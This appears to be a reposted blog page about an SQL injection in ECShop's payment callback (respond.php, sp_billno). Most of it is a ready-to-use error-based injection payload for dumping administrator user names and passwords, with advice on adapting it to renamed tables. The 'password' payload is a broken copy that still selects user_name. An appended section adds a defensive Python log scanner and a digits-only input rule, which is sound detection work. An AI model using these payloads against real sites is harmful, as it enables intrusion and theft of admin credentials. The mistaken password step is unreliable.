ECShop payment vulnerability manual injection: solution
Source: Internet  Editor: 程序博客网  Date: 2024/05/18 02:57
The original exploit is:
==========================================
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select
(select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1
==========================================
Improved version: an exploit that successfully returns the user name and password fields
Dump the user name:
==========================================
http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
==========================================
Dump the password:
==========================================
http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
==========================================
If the table prefix has been changed, the error looks like this:
==========================================
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
==========================================
Simply change ecs_admin_user to aml_admin_user.
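
Every payload above places SQL in `sp_billno`, which the error output shows being concatenated unquoted into `WHERE order_id=...`. As an added example (not part of the original page), the Python code below flags such requests in web access logs; the log lines are constructed, and it assumes a legitimate `sp_billno` is a plain decimal order id.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
# Building blocks of the duplicate-key error technique in the payloads above.
MARKERS = ("floor(rand(", "information_schema", "group by", "concat(")

# Constructed access-log lines (combined log format); not from the original page.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/May/2024:02:57:01 +0800] "GET /respond.php?code=tenpay'
    '&attach=voucher&sp_billno=2024051800017 HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/May/2024:02:57:09 +0800] "GET /respond.php?code=tenpay'
    '&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),'
    'floor(rand(0)*2)x%20from%20information_schema.tables%20group%20by%20x)a)'
    ' HTTP/1.1" 200 1893',
    '203.0.113.9 - - [18/May/2024:02:57:15 +0800] "GET /respond.php?code=tenpay'
    '&sp_billno=1%27 HTTP/1.1" 200 1200',
    '198.51.100.7 - - [18/May/2024:02:58:00 +0800] "GET /goods.php?id=12 HTTP/1.1" 200 9000',
]

def inspect_line(line):
    """Return a finding dict for a suspicious respond.php request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/respond.php"):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("sp_billno", []):
        # Assumption: a legitimate sp_billno is a plain decimal order id.
        if not re.fullmatch(r"[0-9]+", value):
            lowered = value.lower()
            return {
                "client": line.split()[0],
                "value": value,  # URL-decoded parameter as the application sees it
                "markers": [m for m in MARKERS if m in lowered],
            }
    return None

def scan(lines):
    """Return all findings, in log order."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule, enforced in the application before the query is built, keeps `sp_billno` from carrying SQL into the `order_id` comparison.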